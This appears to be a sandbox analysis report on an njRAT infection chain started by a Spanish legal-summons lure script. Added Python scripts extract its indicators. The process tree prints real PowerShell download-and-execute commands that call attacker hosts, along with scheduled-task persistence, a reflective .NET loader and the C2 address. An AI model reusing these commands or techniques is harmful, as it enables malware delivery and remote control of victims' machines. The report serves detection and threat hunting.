Analysis
max time kernel: 300s
max time network: 302s
platform: windows10-2004_x64
resource: win10v2004-20220812-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
submitted: 27/09/2022, 06:42
Static task: static1
Behavioral task: behavioral1
Sample: Denuncia en su contra y detalles de la citacion.wsf
Resource: win7-20220812-en
General
Target: Denuncia en su contra y detalles de la citacion.wsf (Spanish: "Complaint against you and details of the summons"; a legal-threat lure)
Size: 171KB
MD5: abba9bfa9425c66df09fe00a63876ece
SHA1: 3c2e055f21cdb118619497f70e4a6882265c7ef8
SHA256: c738d9ae6eec6bb34b54cf66de709a61c6c7d22d98d8762fdf6b5b5b9c48021b
SHA512: 31bfa060814416d73b0fd5de00c09491b4386bea8a036c248b27de04f96f17de2068538d627dca756bad52f6347d1ce4b5106a01d7e1cdbff3569d3e4f63ce3f
SSDEEP: 48:oyRZ4meLOL8GELn2HH+ukgSHoUFIgEciIZJ9GFnFqFTF8RZFnFDwF4FuFMFZF/yu:oi4meawMkg0LFIguSJERt+UZ6K8y
Malware Config

Extracted (URL)
http://20.7.14.99/dll/dll_ink.pdf (the Base64-encoded .NET assembly fetched by the stage-2 PowerShell loader; the .pdf extension is cosmetic)

Extracted (njrat)
Family: njrat
Version: 0.7NC
Botnet: NYAN CAT
C2: hv2022.dyndns.ws:2225
Mutex: b00ac376fe85426b91
reg_key: b00ac376fe85426b91
splitter: @!#&^%$
Signatures

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro. Here the parent is the WMI provider host, which is consistent with the script creating the task through WMI (e.g. Win32_Process.Create) rather than as a direct child of WScript.exe; that is also why schtasks.exe appears at the top level of the process tree.
description | pid | pid_target | Process | procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 1232 | 1864 | schtasks.exe | 79

Blocklisted process makes network request (4 IoCs)
flow | pid | Process
35 | 4156 | powershell.exe
37 | 4156 | powershell.exe
38 | 3012 | powershell.exe
40 | 3012 | powershell.exe

Checks computer location settings (2 TTPs, 1 IoC)
Looks up the country code configured in the registry, likely a geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation | WScript.exe

Drops startup file (1 IoC)
description | ioc | Process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnk | powershell.exe

Suspicious use of SetThreadContext (1 IoC)
description | pid | Process | procid_target
PID 3012 set thread context of 4112 | 3012 | powershell.exe | 96

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). The signature's generic text calls this likely ransomware behaviour; nothing in this report shows encryption, and the extracted payload is njRAT, which enumerates drives for its removable-media spreading, so read this flag as drive enumeration.

Creates scheduled task(s) (1 TTP, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
1232 | schtasks.exe

Modifies registry class (1 IoC)
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings | powershell.exe

Suspicious behavior: EnumeratesProcesses (6 IoCs)
pid | Process
4156 | powershell.exe (x2)
3012 | powershell.exe (x2)
1964 | powershell.exe (x2)

Suspicious use of AdjustPrivilegeToken (3 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 4156 | powershell.exe
Token: SeDebugPrivilege | 3012 | powershell.exe
Token: SeDebugPrivilege | 1964 | powershell.exe

Suspicious use of WriteProcessMemory (14 IoCs)
description | pid | Process | procid_target | count
PID 4156 wrote to memory of 3656 | 4156 | powershell.exe | 91 | 2
PID 3656 wrote to memory of 3012 | 3656 | WScript.exe | 92 | 2
PID 3012 wrote to memory of 1964 | 3012 | powershell.exe | 94 | 2
PID 3012 wrote to memory of 4112 | 3012 | powershell.exe | 96 | 8
The two writes per parent-to-child pair are the ordinary ones made at process creation. The eight writes into 4112 (RegAsm.exe, launched with no arguments) together with the SetThreadContext on the same target are the API pattern of injection into a hollowed host process.
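To show why the WriteProcessMemory rows alone are not the signal, here is an added correlation script (not part of the sandbox report): it pairs each "wrote to memory of" row with any "set thread context of" row for the same source and target and resolves the PIDs against the process list above. The process list and event strings are copied from this report; the regex assumes the sandbox's own wording for these two signatures.

```python
"""Correlate the WriteProcessMemory and SetThreadContext rows from the
Signatures section into injection candidates. Process list and event text
are copied from this report; the regex targets the sandbox's own wording."""
import re
from collections import defaultdict

# PID -> image name, taken from the Processes section of the report.
PROCESSES = {
    1188: "WScript.exe", 1232: "schtasks.exe", 4156: "powershell.exe",
    3656: "WScript.exe", 3012: "powershell.exe", 1964: "powershell.exe",
    4112: "RegAsm.exe",
}

# The IoC descriptions, one entry per reported event (the report lists the
# 3012 -> 4112 write eight times).
EVENTS = (
    ["PID 4156 wrote to memory of 3656"] * 2
    + ["PID 3656 wrote to memory of 3012"] * 2
    + ["PID 3012 wrote to memory of 1964"] * 2
    + ["PID 3012 wrote to memory of 4112"] * 8
    + ["PID 3012 set thread context of 4112"]
)

EVENT_RE = re.compile(r"PID (\d+) (wrote to memory of|set thread context of) (\d+)")


def correlate(events, processes):
    """Return one tuple (src_pid, src_image, dst_pid, dst_image, write_count)
    per (source, target) pair that shows both memory writes and a
    SetThreadContext. A couple of writes from a parent into a freshly
    created child are normal process start-up, so writes alone are not
    reported; the thread-context change on the same target is what turns
    them into the hollowing / injection pattern."""
    writes = defaultdict(int)
    context_set = set()
    for text in events:
        m = EVENT_RE.match(text)
        if not m:
            continue
        src, kind, dst = int(m.group(1)), m.group(2), int(m.group(3))
        if kind.startswith("wrote"):
            writes[(src, dst)] += 1
        else:
            context_set.add((src, dst))
    hits = []
    for src, dst in sorted(context_set):
        if writes[(src, dst)]:
            hits.append((src, processes.get(src, "?"), dst,
                         processes.get(dst, "?"), writes[(src, dst)]))
    return hits


if __name__ == "__main__":
    for src, src_img, dst, dst_img, n in correlate(EVENTS, PROCESSES):
        print("%d (%s) -> %d (%s): %d writes + SetThreadContext"
              % (src, src_img, dst, dst_img, n))
```

On this report the only hit is powershell.exe (3012) into RegAsm.exe (4112); the 4156 to 3656 and 3656 to 3012 writes are parent-to-child start-up writes and are correctly left alone.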
Processes
(indented by depth in the process tree; "Signatures:" lists the signatures attributed to that process)

[depth 1] C:\Windows\System32\WScript.exe  PID 1188
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Denuncia en su contra y detalles de la citacion.wsf"

[depth 1] C:\Windows\system32\schtasks.exe  PID 1232
    schtasks /create /sc MINUTE /mo 5 /tn "OneDrive Reporting Tas" /tr "\"%windir%\system32\WindowsPowershell\v1.0\powershell.exe\" -Windowstyle Hidden $a = wget 'https://notificacionesdelafiscalia.com/t52ph4t' -o C:\Windows\Temp\t.vbs;start-sleep 5;start-Process C:\Windows\Temp\t.vbs" /F
    Signatures: Process spawned unexpected child process; Creates scheduled task(s)

[depth 1] C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe  PID 4156
    C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe -Windowstyle Hidden $a = wget "https://notificacionesdelafiscalia.com/t52ph4t" -o C:\Windows\Temp\t.vbs;start-sleep 5;start-Process C:\Windows\Temp\t.vbs
    Signatures: Blocklisted process makes network request; Modifies registry class; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory

    [depth 2] C:\Windows\System32\WScript.exe  PID 3656
        "C:\Windows\System32\WScript.exe" "C:\Windows\Temp\t.vbs"
        Signatures: Checks computer location settings; Suspicious use of WriteProcessMemory

        [depth 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PID 3012
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.7.14.99/dll/dll_ink.pdf'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('b41c42003d6a-78c9-52d4-d8d1-25d8b8f0=nekot&aidem=tla?txt.sndnyd.2202vhF2%5222/o/moc.topsppa.3785b-ceyorp-wen/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'))
            Signatures: Blocklisted process makes network request; Drops startup file; Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory

            [depth 4] C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe  PID 1964
                "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\Windows\Temp\Debug.vbs
                Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

            [depth 4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  PID 4112
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
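The two PowerShell command lines in the tree carry the whole delivery chain: the scheduled-task action re-downloads and runs t.vbs every five minutes (wget is a built-in PowerShell alias for Invoke-WebRequest), and the stage-2 one-liner Base64-decodes a .NET assembly fetched from http://20.7.14.99/dll/dll_ink.pdf, loads it in-process with AppDomain.Load and invokes Fiber.Home.VAI with a string argument that is simply written backwards. The following Python script is an added example, not part of the sandbox report or the sample: it extracts the task switches and the loader's indicators from those command lines and reverses the argument. The command lines are copied verbatim from this report; the regular expressions are written for this report's phrasing, and the helper names (parse_schtasks, decode_loader, network_hosts) are this example's own. What the VAI method does with the recovered URL is not shown on this page and is not claimed here; what the script demonstrates is that the reversed argument is a URL.

```python
"""Pull indicators out of the two PowerShell command lines recorded in the
process tree of this report: the scheduled-task action (stage 1) and the
reflective .NET loader (stage 2). Everything here runs offline: the command
lines are copied from the report, nothing is downloaded or executed."""
import re
from urllib.parse import urlsplit

# Command lines as recorded in the sandbox process tree (copied from the report).
SCHTASKS_CMDLINE = r"""schtasks /create /sc MINUTE /mo 5 /tn "OneDrive Reporting Tas" /tr "\"%windir%\system32\WindowsPowershell\v1.0\powershell.exe\" -Windowstyle Hidden $a = wget 'https://notificacionesdelafiscalia.com/t52ph4t' -o C:\Windows\Temp\t.vbs;start-sleep 5;start-Process C:\Windows\Temp\t.vbs" /F"""

LOADER_CMDLINE = r"""
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.7.14.99/dll/dll_ink.pdf'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('b41c42003d6a-78c9-52d4-d8d1-25d8b8f0=nekot&aidem=tla?txt.sndnyd.2202vhF2%5222/o/moc.topsppa.3785b-ceyorp-wen/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'))
""".strip()

URL_RE = re.compile(r"https?://[^\s'\"<>;]+")


def parse_schtasks(cmdline):
    """Split a `schtasks /create` line into its switches.

    Returns the task name (/tn), schedule (/sc) and modifier (/mo), the
    action (/tr, with the \" escapes undone) and every URL inside the action.
    """
    def opt(flag, value_pattern):
        m = re.search(r"/%s\s+%s" % (flag, value_pattern), cmdline, re.IGNORECASE)
        return m.group(1) if m else None

    # The action is a double-quoted string whose inner quotes are escaped as \".
    action = opt("tr", r'"((?:[^"\\]|\\.)*)"')
    if action is not None:
        action = action.replace('\\"', '"')
    return {
        "tn": opt("tn", r'"([^"]*)"'),
        "sc": opt("sc", r"(\S+)"),
        "mo": opt("mo", r"(\S+)"),
        "tr": action,
        "urls": URL_RE.findall(action or ""),
        "force": re.search(r"\s/f\b", cmdline, re.IGNORECASE) is not None,
    }


def decode_loader(cmdline):
    """Parse the reflective-load one-liner: the URL handed to DownloadString,
    the type/method resolved on the loaded assembly and the string argument
    passed to it. The argument is stored reversed, so it is reversed back and
    checked for a URL scheme."""
    def grab(pattern):
        m = re.search(pattern, cmdline)
        return m.group(1) if m else None

    raw_arg = grab(r"Invoke\(\$null,\s*\[object\[\]\]\s*\('([^']+)'\)")
    decoded = raw_arg[::-1] if raw_arg else None
    return {
        "stage1_url": grab(r"DownloadString\('([^']+)'\)"),
        "type": grab(r"GetType\('([^']+)'\)"),
        "method": grab(r"GetMethod\('([^']+)'\)"),
        "argument_raw": raw_arg,
        "argument_decoded": decoded,
        "argument_is_url": bool(decoded) and decoded.startswith(("http://", "https://")),
    }


def network_hosts(schtasks_cmdline=SCHTASKS_CMDLINE, loader_cmdline=LOADER_CMDLINE):
    """Hostnames contacted across both stages, including the one hidden in
    the reversed argument. Handy for a block list or a proxy-log pivot."""
    urls = list(parse_schtasks(schtasks_cmdline)["urls"])
    loader = decode_loader(loader_cmdline)
    if loader["stage1_url"]:
        urls.append(loader["stage1_url"])
    if loader["argument_is_url"]:
        urls.append(loader["argument_decoded"])
    return sorted({urlsplit(u).hostname for u in urls})


if __name__ == "__main__":
    task = parse_schtasks(SCHTASKS_CMDLINE)
    print("task %r runs every %s %s, action: %s" % (task["tn"], task["mo"], task["sc"], task["tr"]))
    loader = decode_loader(LOADER_CMDLINE)
    print("stage 1:", loader["stage1_url"])
    print("entry  :", loader["type"] + "." + loader["method"])
    print("stage 2:", loader["argument_decoded"])
    print("hosts  :", ", ".join(network_hosts()))
```

Reversing the argument yields https://firebasestorage.googleapis.com/v0/b/new-proyec-b5873.appspot.com/o/2225%2Fhv2022.dyndns.txt?alt=media&token=0f8b8d52-1d8d-4d25-9c87-a6d30024c14b. Two things in that URL are worth noting for hunting: the object path 2225/hv2022.dyndns.txt echoes the njRAT C2 extracted above (hv2022.dyndns.ws:2225), and the host is Firebase Storage, so a reputation check on the domain alone will pass; block or pivot on the full path and token instead.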
Network
MITRE ATT&CK Enterprise v6
Downloads

Filesize: 3KB
MD5: 556084f2c6d459c116a69d6fedcc4105
SHA1: 633e89b9a1e77942d822d14de6708430a3944dbc
SHA256: 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA512: 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Filesize: 1KB
MD5: 33e9dd1bc41e70c4fbdf04b85cf36ff4
SHA1: 0433625fae735abc2f11249456e212dfca1473a9
SHA256: f11191abae782730f3e16400aef46c9e8404c2608dc132ec646b41e7f07911f9
SHA512: d74083d2f0e7fe21db55c7c0bc880dd2d1fe92ca806c79f77ec0bbc7d2ae5fd1d3509d2ebd0fa60efbab0688711902b7a1da6419aba94a0897810ccf6d9957df

Filesize: 1KB
MD5: af1cb166ef60425f7f761c7e2a56271c
SHA1: 3d24a690ddbe7f2c099aa54198b1af5a0a0fa429
SHA256: b5f5944d0252a0dad2c96e9f46799557f59855169cb1693dc40f1fdfd524bb4f
SHA512: 39f8eea604c85b92b98775fd85db519941c7a4c5cc2f1ae4228048a3f1963765d813e79b6ea354a329ad0c220dd1c7d68898affbfcad5d47a5d4a95de86217ce

Filesize: 577KB
MD5: 61f778fb90f57dd17579f8fcbb81599b
SHA1: 8c894032d3f7ea36c7fd9f44d999f8e25385fe93
SHA256: 5b7bf75498ebda8816ccb651e41b39b12ac087682f826a597caa717cc18afdbd
SHA512: 58062880faf4e85f51166bbd6d738181b2188ebba104c275dc2423bc6f120f1818cd572b6a2d549ee3126cef3afb5ae276c1c137c65e1cd988105fb10f4cc09c